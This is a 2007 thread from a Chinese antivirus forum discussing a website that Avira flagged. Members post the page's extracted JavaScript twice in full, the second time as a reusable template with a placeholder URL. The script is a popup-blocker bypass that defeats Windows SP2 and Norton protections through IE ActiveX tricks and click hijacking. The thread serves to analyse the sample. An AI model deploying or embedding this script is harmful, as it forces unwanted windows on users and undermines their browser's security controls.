查看: 4066|回复: 6
收起左侧

[病毒样本] 清风网络被挂马,红伞报警

[复制链接]
Oceanzd
发表于 2007-1-16 04:51:33 | 显示全部楼层 |阅读模式
就是下面这个网址:

  1. www.vipcn.com
复制代码


不过可能是弹出窗口带有木马,发现原代码没有什么发现

发现原来有个指向下面网址的连接,红伞报已知JS木马。
  1. www.ting88.com
复制代码

提取了网页的原代码给大家看看
<script language="javascript">
var paypopupURL = "http://www.ting88.com";
var paypopupURL1 = "http://www.ting88.com";
var usingActiveX = true;
function blockError(){return true;}
window.onerror = blockError;
//bypass norton internet security popup blocker
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
if (typeof(usingClick) == 'undefined') {var usingClick = false;}
if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}
if (typeof(popwin) == 'undefined') {var popwin = null;}
if (typeof(poped) == 'undefined') {var poped = false;}
//if (typeof(paypopupURL) == 'undefined') {var paypopupURL = "http://www.ting88.com/ad/bt.htm";}
var blk = 1;
var setupClickSuccess = false;
var googleInUse = false;
var myurl = location.href+'/';
var MAX_TRIED = 20;
var activeXTried = false;
var tried = 0;
var randkey = '0';  // random key from server
var myWindow;
var popWindow;
var setupActiveXSuccess = 0;
// bypass IE functions
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<DIV STYLE="display:none;"><INPUT  ID="autoHit" TYPE="TEXT" ></DIV>');
popWindow=window.createPopup();
popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT></DIV>';
document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" src="/about:blank"></IFRAME>');
popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT>');
setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}
function tryActiveX(){
if (!activeXTried && !poped)
{
if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow)
{
myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;
}
else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow)
{
myWindow=popIframe.getParentFrame.object.parentWindow;
popIframe.location.replace('about:blank');
}
else
{setTimeout('tryActiveX()',200);
tried++;
if (tried >= MAX_TRIED && !activeXTried)
{
activeXTried = true;
setupClick();}return;
}
openActiveX();
window.windowFired=true;self.focus();
}
}

function openActiveX()
{
if (!activeXTried && !poped)
{
if (myWindow && window.windowFired)
{
window.windowFired=false;
document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));
}
else
{
setTimeout('openActiveX();',100);
}
tried++;
if (tried >= MAX_TRIED)
{activeXTried = true;setupClick();
}
}
}
function showActiveX()
{
if (!activeXTried && !poped)
{
if (googleInUse) {
window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);
window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
}
newWindow=myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//newWindow=myWindow.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");
if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}
// end bypass IE functions
// normal call functions
function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {
popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//popwin1 = window.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");
if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}
// end normal call functions
// onclick call functions
function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}
function gopop() {
if (!poped)
{popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
if (popwin) {poped = true;}self.focus();}
if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// end onclick call functions
// check version
function detectGoogle() {if (usingActiveX) {try {document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}
function version() {
var os = 'W0';
var bs = 'I0';
var isframe = false;
var browser = window.navigator.userAgent;
if (browser.indexOf('Win') != -1) {os = 'W1';}
if (browser.indexOf("SV1") != -1) {bs = 'I2';}
else if (browser.indexOf("Opera") != -1) {bs = "I0";}
else if (browser.indexOf("Firefox") != -1) {bs = "I0";}
else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}
if (top.location != this.location) {isframe = true;}
paypopupURL = paypopupURL;
usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();
}
version();
// end check version
function loadingPop() {
        if(!usingClick && !usingActiveX) {
                paypopup();
        }
        else if (usingActiveX) {tryActiveX();}
        else {setupClick();}
}

//\\\\\\\\\\\\\\
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
//设置cookies时间,自己根据情况设置。
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*6*60*60*1000));
function amt(){
var count = GetCookie('countsports'); //同一ip只显示一次
//var count;//同一ip只显示N次
//alert(count);
//count = null;
if(count == null) {
SetCookie('countsports','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('countsports',newcount,exp);
//DeleteCookie('countsports')
return newcount
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function btpop(){
if(amt()==1)
{
openWindowBack();
try{
aryADSeq.push("openWindowBack()");
}catch(e){
openWindowBack();
}
}
}
function openWindowBack() {
myurl = myurl.substring(0, myurl.indexOf('/',8));
if (myurl == '') {myurl = '.';}
setupActiveX();
loadingPop();
//self.focus();
}
btpop();
//setTimeout('btpop();',5000); //??5????
</script>

[ 本帖最后由 jzhhh 于 2007-1-16 04:59 编辑 ]

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
曲中求
发表于 2007-1-16 07:59:13 | 显示全部楼层
俺用opera浏览时不报,但调用IE时NOD 32报了:

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
Oceanzd
 楼主| 发表于 2007-1-16 08:03:41 | 显示全部楼层

回复 #2 曲中求 的帖子

不是用红伞的吗?怎么又加了个NOD?
曲中求
发表于 2007-1-16 08:10:19 | 显示全部楼层

回复 #3 jzhhh 的帖子

红伞我这里升级好慢。。。。呵呵。。这个。。。这个。。。。
九尾野狐
头像被屏蔽
发表于 2007-1-16 08:47:40 | 显示全部楼层
www.vipcn.com  未被挂马

www.ting88.com  也未带病毒

之所以报的原因是因为www.vipcn.com 使用了一个恶意弹窗代码,该代码可以突破SP2,实现每24小时弹窗一次。

代码如下:

var paypopupURL = "http://www.xxx.com";
var paypopupURL1 = "http://www.xxx.com";

var usingActiveX = true;
function blockError(){return true;}
window.onerror = blockError;
//bypass norton internet security popup blocker
if (window.SymRealWinOpen){window.open = SymRealWinOpen;}
if (window.NS_ActualOpen) {window.open = NS_ActualOpen;}
if (typeof(usingClick) == 'undefined') {var usingClick = false;}
if (typeof(usingActiveX) == 'undefined') {var usingActiveX = false;}
if (typeof(popwin) == 'undefined') {var popwin = null;}
if (typeof(poped) == 'undefined') {var poped = false;}

var blk = 1;
var setupClickSuccess = false;
var googleInUse = false;
var myurl = location.href+'/';
var MAX_TRIED = 20;
var activeXTried = false;
var tried = 0;
var randkey = '0'; // random key from server
var myWindow;
var popWindow;
var setupActiveXSuccess = 0;
// bypass IE functions
function setupActiveX() {if (usingActiveX) {try{if (setupActiveXSuccess < 5) {document.write('<DIV STYLE="display:none;"><INPUT ID="autoHit" TYPE="TEXT" ></DIV>');
popWindow=window.createPopup();
popWindow.document.body.innerHTML='<DIV ID="objectRemover"><OBJECT ID="getParentDiv" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT></DIV>';
document.write('<IFRAME NAME="popIframe" STYLE="position:absolute;top:-100px;left:0px;width:1px;height:1px;" src="/about:blank"></IFRAME>');
popIframe.document.write('<OBJECT ID="getParentFrame" STYLE="position:absolute;top:0px;left:0px;" WIDTH=1 HEIGHT=1 DATA="'+myurl+'/paypopup.html" TYPE="text/html"></OBJECT>');
setupActiveXSuccess = 6;}}catch(e){if (setupActiveXSuccess < 5) {setupActiveXSuccess++;setTimeout('setupActiveX();',500);}else if (setupActiveXSuccess == 5) {activeXTried = true;setupClick();}}}}

function tryActiveX(){
if (!activeXTried && !poped)
{
if (setupActiveXSuccess == 6 && googleInUse && popWindow && popWindow.document.getElementById('getParentDiv') && popWindow.document.getElementById('getParentDiv').object && popWindow.document.getElementById('getParentDiv').object.parentWindow)
{
myWindow=popWindow.document.getElementById('getParentDiv').object.parentWindow;
}
else if (setupActiveXSuccess == 6 && !googleInUse && popIframe && popIframe.getParentFrame && popIframe.getParentFrame.object && popIframe.getParentFrame.object.parentWindow)
{
myWindow=popIframe.getParentFrame.object.parentWindow;
popIframe.location.replace('about:blank');
}
else
{setTimeout('tryActiveX()',200);
tried++;
if (tried >= MAX_TRIED && !activeXTried)
{
activeXTried = true;
setupClick();}return;
}
openActiveX();
window.windowFired=true;self.focus();
}
}

function openActiveX()
{
if (!activeXTried && !poped)
{
if (myWindow && window.windowFired)
{
window.windowFired=false;
document.getElementById('autoHit').fireEvent("onkeypress",(document.createEventObject().keyCode=escape(randkey).substring(1)));
}
else
{
setTimeout('openActiveX();',100);
}
tried++;
if (tried >= MAX_TRIED)
{activeXTried = true;setupClick();
}
}
}

function showActiveX()
{
if (!activeXTried && !poped)
{
if (googleInUse) {
window.daChildObject=popWindow.document.getElementById('objectRemover').children(0);
window.daChildObject=popWindow.document.getElementById('objectRemover').removeChild(window.daChildObject);
}
newWindow=myWindow.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//newWindow=myWindow.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");

if (newWindow) {newWindow.blur();self.focus();activeXTried = true;poped = true;}else {if (!googleInUse) {googleInUse=true;tried=0;tryActiveX();}else {activeXTried = true;setupClick();}}}}
// end bypass IE functions
// normal call functions

function paypopup(){if (!poped) {if(!usingClick && !usingActiveX) {
popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");
//popwin1 = window.open(paypopupURL1,'12345', "width=760,height=350,top=300,left=150");
if (popwin) {poped = true;}self.focus();}}if (!poped) {if (usingActiveX) {tryActiveX();}else {setupClick();}}}
// end normal call functions
// onclick call functions

function setupClick() {if (!poped && !setupClickSuccess){if (window.Event) document.captureEvents(Event.CLICK);prePaypopOnclick = document.onclick;document.onclick = gopop;self.focus();setupClickSuccess=true;}}

function gopop() {
if (!poped)
{popwin = window.open(paypopupURL, "abcdefg", "width=650,height=300,top=300,left=150,toolbar=yes,menubar=yes,scrollbars=yes,resizable=yes,location=yes,status=yes");

if (popwin) {poped = true;}self.focus();}
if (typeof(prePaypopOnclick) == "function") {prePaypopOnclick();}}
// end onclick call functions
// check version
function detectGoogle() {if (usingActiveX) {try {document.write('<DIV STYLE="display:none;"><OBJECT ID="detectGoogle" CLASSID="clsid:00EF2092-6AC5-47c0-BD25-CF2D5D657FEB" STYLE="display:none;" CODEBASE="view-source:about:blank"></OBJECT></DIV>');googleInUse|=(typeof(document.getElementById('detectGoogle'))=='object');}catch(e){setTimeout('detectGoogle();',50);}}}

function version() {
var os = 'W0';
var bs = 'I0';
var isframe = false;
var browser = window.navigator.userAgent;
if (browser.indexOf('Win') != -1) {os = 'W1';}
if (browser.indexOf("SV1") != -1) {bs = 'I2';}
else if (browser.indexOf("Opera") != -1) {bs = "I0";}
else if (browser.indexOf("Firefox") != -1) {bs = "I0";}
else if (browser.indexOf("Microsoft") != -1 || browser.indexOf("MSIE") != -1) {bs = 'I1';}
if (top.location != this.location) {isframe = true;}
paypopupURL = paypopupURL;
usingClick = blk && ((browser.indexOf("SV1") != -1) || (browser.indexOf("Opera") != -1) || (browser.indexOf("Firefox") != -1));usingActiveX = blk && (browser.indexOf("SV1") != -1) && !(browser.indexOf("Opera") != -1) && ((browser.indexOf("Microsoft") != -1) || (browser.indexOf("MSIE") != -1));detectGoogle();
}

version();

// end check version
function loadingPop() {
if(!usingClick && !usingActiveX) {
paypopup();
}
else if (usingActiveX) {tryActiveX();}
else {setupClick();}
}

//\\\\\\\\\\\\\\
function GetCookie (name) {
var arg = name + "=";
var alen = arg.length;
var clen = document.cookie.length;
var i = 0;
while (i < clen) {
var j = i + alen;
if (document.cookie.substring(i, j) == arg)
return getCookieVal (j);
i = document.cookie.indexOf(" ", i) + 1;
if (i == 0) break;
}
return null;
}
function SetCookie (name, value) {
var argv = SetCookie.arguments;
var argc = SetCookie.arguments.length;
var expires = (argc > 2) ? argv[2] : null;
var path = (argc > 3) ? argv[3] : null;
var domain = (argc > 4) ? argv[4] : null;
var secure = (argc > 5) ? argv[5] : false;
document.cookie = name + "=" + escape (value) +
((expires == null) ? "" : ("; expires=" + expires.toGMTString())) +
((path == null) ? "" : ("; path=" + path)) +
((domain == null) ? "" : ("; domain=" + domain)) +
((secure == true) ? "; secure" : "");
}
function DeleteCookie (name) {
var exp = new Date();
exp.setTime (exp.getTime() - 1);
// This cookie is history
var cval = 0;
document.cookie = name + "=" + cval + "; expires=" + exp.toGMTString();
}
//设置cookies时间,自己根据情况设置。
var expDays = 1;
var exp = new Date();
exp.setTime(exp.getTime() + (expDays*6*60*60*1000));
function amt(){
var count = GetCookie('countsports'); //同一ip只显示一次
//var count;//同一ip只显示N次
//alert(count);
//count = null;
if(count == null) {
SetCookie('countsports','1')
return 1
}
else{
var newcount = parseInt(count) + 1;
if(newcount<2) count=1;
SetCookie('countsports',newcount,exp);
//DeleteCookie('countsports')
return newcount
}
}
function getCookieVal(offset) {
var endstr = document.cookie.indexOf (";", offset);
if (endstr == -1)
endstr = document.cookie.length;
return unescape(document.cookie.substring(offset, endstr));
}
function btpop(){
if(amt()==1)
{
openWindowBack();
try{
aryADSeq.push("openWindowBack()");
}catch(e){
openWindowBack();
}
}
}
function openWindowBack() {
myurl = myurl.substring(0, myurl.indexOf('/',8));
if (myurl == '') {myurl = '.';}
setupActiveX();
loadingPop();
//self.focus();
}
btpop()

评分

参与人数 1经验 +2 收起 理由
jzhhh + 2 感谢解答: )

查看全部评分

Oceanzd
 楼主| 发表于 2007-1-16 08:56:10 | 显示全部楼层

回复 #5 没注册 的帖子

专业的解释不一样哈
chow2006
发表于 2007-1-16 13:14:42 | 显示全部楼层
原帖由 没注册 于 2007-1-16 08:47 发表
www.vipcn.com  未被挂马

www.ting88.com  也未带病毒

之所以报的原因是因为www.vipcn.com 使用了一个恶意弹窗代码,该代码可以突破SP2,实现每24小时弹窗一次。

代码如下:



现在流氓和木马的界线越来越模糊了
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-12-1 00:49 , Processed in 0.132840 second(s), 19 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表